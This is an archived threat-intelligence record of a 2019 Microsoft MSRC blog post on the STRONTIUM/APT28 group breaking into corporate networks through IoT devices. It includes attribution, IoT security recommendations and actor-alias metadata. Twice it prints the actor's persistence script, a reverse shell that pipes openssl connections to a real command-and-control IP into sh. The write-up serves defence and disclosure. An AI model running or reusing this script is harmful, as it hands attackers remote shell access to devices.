{ "id": "a678a963-60d0-4dd0-b62e-963aa895b114", "created_at": "2026-04-06T00:13:04.722944Z", "updated_at": "2026-04-10T03:37:50.496065Z", "deleted_at": null, "sha1_hash": "b7f0b0cbc98661043021b763e1226d9db89845b8", "title": "Corporate IoT - a path to intrusion", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 71186, "plain_text": "Corporate IoT - a path to intrusion\r\nBy MSRC Team\r\nPublished: 2019-08-05 · Archived: 2026-04-05 13:17:44 UTC\r\nSeveral sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT\r\ndevices are purposefully designed to connect to a network and many are simply connected to the internet with\r\nlittle management or oversight. Such devices still must be identifiable, maintained, and monitored by security\r\nteams, especially in large complex enterprises. Some IoT devices may even communicate basic telemetry back to\r\nthe device manufacturer or have means to receive software updates. In most cases however, the customers’ IT\r\noperation center don’t know they exist on the network.\r\nIn 2016, the Mirai botnet was discovered by the malware research group MalwareMustDie. The botnet initially\r\nconsisted of IP cameras and basic home routers, two types of IoT devices commonly found in the household. As\r\nmore variants of Mirai emerged, so did the list IoT devices it was targeting. The source code for the malware\r\npowering this botnet was eventually leaked online.\r\nIn 2018, hundreds of thousands of home and small business networking and storage devices were compromised\r\nand loaded with the so-called “VPN Filter” malware. The FBI has publicly attributed this activity to a nation-state\r\nactor and took subsequent actions to disrupt this botnet, although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user.\r\nThere were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the\r\n2018 Olympic Games in PyeongChang. Officials did confirm a few days later that they were a victim of malicious\r\ncyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access\r\nin the main press center simply stopped working.\r\nThree IoT devices\r\nIn April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known\r\nadversary communicating to several external devices. Further research uncovered attempts by the actor to\r\ncompromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer\r\nlocations. The investigation uncovered that an actor had used these devices to gain initial access to corporate\r\nnetworks. In two of the cases, the passwords for the devices were deployed without changing the default\r\nmanufacturer’s passwords and in the third instance the latest security update had not been applied to the device.\r\nThese devices became points of ingress from which the actor established a presence on the network and continued\r\nlooking for further access. Once the actor had successfully established access to the network, a simple network\r\nscan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data. After gaining access to each of the IoT devices,\r\nthe actor ran tcpdump to sniff network traffic on local subnets. They were also seen enumerating administrative\r\ngroups to attempt further exploitation. As the actor moved from one device to another, they would drop a simple\r\nhttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nPage 1 of 4\n\nshell script to establish persistence on the network which allowed extended access to continue hunting. Analysis of\r\nnetwork traffic showed the devices were also communicating with an external command and control (C2) server.\r\n-- contents of [IOT Device] ` file–\r\n!/bin/sh\r\nexport _ [IOT Device] _`` =\"-qws -display :1 -nomouse\" echo 1|tee /tmp/.c;sh -c '(until (sh -c\r\n\"openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh \u0026\u0026 break; done| openssl\r\ns_client -quiet -host 167.114.153.55 -port 443\"); do (sleep 10 \u0026\u0026 cn=$(( cat /tmp/.c`+1)) \u0026\u0026 echo\r\n$cn|tee /tmp.c \u0026\u0026 if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)\u0026’ \u0026\r\nFigure 1: script used to maintain network persistence\r\nThe following IP addresses are believed to have been used by the actor for command and control (C2) during\r\nthese intrusions:\r\nAttribution\r\nWe attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft\r\nrefers to as STRONTIUM. Since we identified these attacks in the early stages, we have not been able to\r\nconclusively determine what STRONTIUM’s ultimate objectives were in these intrusions.\r\nOver the last twelve months, Microsoft has delivered nearly 1400 nation-state notifications to those who have\r\nbeen targeted or compromised by STRONTIUM. One in five notifications of STRONTIUM activity were tied to\r\nattacks against non-governmental organizations, think tanks, or politically affiliated organizations around the\r\nworld. The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors:\r\ngovernment, IT, military, defense, medicine, education, and engineering. We have also observed and notified\r\nSTRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry.\r\nThe “VPN Filter” malware has also been attributed to STRONTIUM by the FBI.\r\nCall to action\r\nToday we are sharing this information to raise awareness of these risks across the industry and calling for better\r\nenterprise integration of IoT devices, particularly the ability to monitor IoT device telemetry within enterprise\r\nnetworks. Today, the number of deployed IoT devices outnumber the population of personal computers and\r\nmobile phones, combined. With each networked IoT device having its own separate network stack, it’s quite easy\r\nto see the need for better enterprise management, especially in today’s “bring your own device” world.\r\nWhile much of the industry focuses on the threats of hardware implants, we can see in this example that\r\nadversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple\r\nattacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in\r\ncorporate environments. Upon conclusion of our investigation, we shared this information with the manufacturers\r\nof the specific devices involved and they have used this event to explore new protections in their products.\r\nHowever, there is a need for broader focus across IoT in general, both from security teams at organizations that\r\nhttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nPage 2 of 4\n\nneed to be more aware of these types of threats, as well as from IoT device makers who need to provide better\r\nenterprise support and monitoring capabilities to make it easier for security teams to defend their networks.\r\nIndicators of Compromise\r\nBelow are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in\r\nthis article.\r\nCommand-and-Control (C2) IP addresses\r\nScript for maintaining persistence on network connected device\r\n--contents of [IOT Device] ` file–\r\n!/bin/sh\r\nexport _ [IOT Device] _`` =\"-qws -display :1 -nomouse\" echo 1|tee /tmp/.c;sh -c '(until (sh -c\r\n\"openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh \u0026\u0026 break; done| openssl\r\ns_client -quiet -host 167.114.153.55 -port 443\"); do (sleep 10 \u0026\u0026 cn=$(( cat /tmp/.c`+1)) \u0026\u0026 echo\r\n$cn|tee /tmp.c \u0026\u0026 if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)\u0026’ \u0026\r\nRecommendations for Securing Enterprise IoT\r\nThere are additional steps an organization can take to protect their infrastructure and network from similar activity.\r\nMicrosoft recommends the following actions to better secure and manage risk associated with IoT devices:\r\n1. Require approval and cataloging of any IoT devices running in your corporate environment.\r\n2. Develop a custom security policy for each IoT device.\r\n3. Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.\r\n4. Use a separate network for IoT devices if feasible.\r\n5. Conduct routine configuration/patch audits against deployed IoT devices.\r\n6. Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device\r\ntraffic, and capture of device images for forensic investigation.\r\n7. Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.\r\n8. Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).\r\n9. Audit any identities and credentials that have authorized access to IoT devices, users and processes.\r\n10. Centralize asset/configuration/patch management if feasible.\r\n11. If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing\r\nsecurity practices to be followed and Audits that report security status and health of all managed devices.\r\n12. Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window\r\nfor investigative response and forensic analysis to any compromise involving their product.\r\nThis case is one of several examples thatEric Doerr will present at Black Hat, on August 8, 2019, where Microsoft\r\nis calling for greater industry transparency to ensure that defenders are best equipped to respond to threats from\r\nhttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nPage 3 of 4\n\nwell-resourced adversaries.\r\nMicrosoft Threat Intelligence Center (MSTIC)\r\nBlack Hat\r\nIoT\r\nMSTIC\r\nSTRONTIUM\r\nSupply chain\r\nThreat intelligence\r\nSource: https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nhttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" ], "report_names": [ "corporate-iot-a-path-to-intrusion" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434384, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.pdf", "text": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.txt", "img": "https://archive.orkl.eu/b7f0b0cbc98661043021b763e1226d9db89845b8.jpg" } }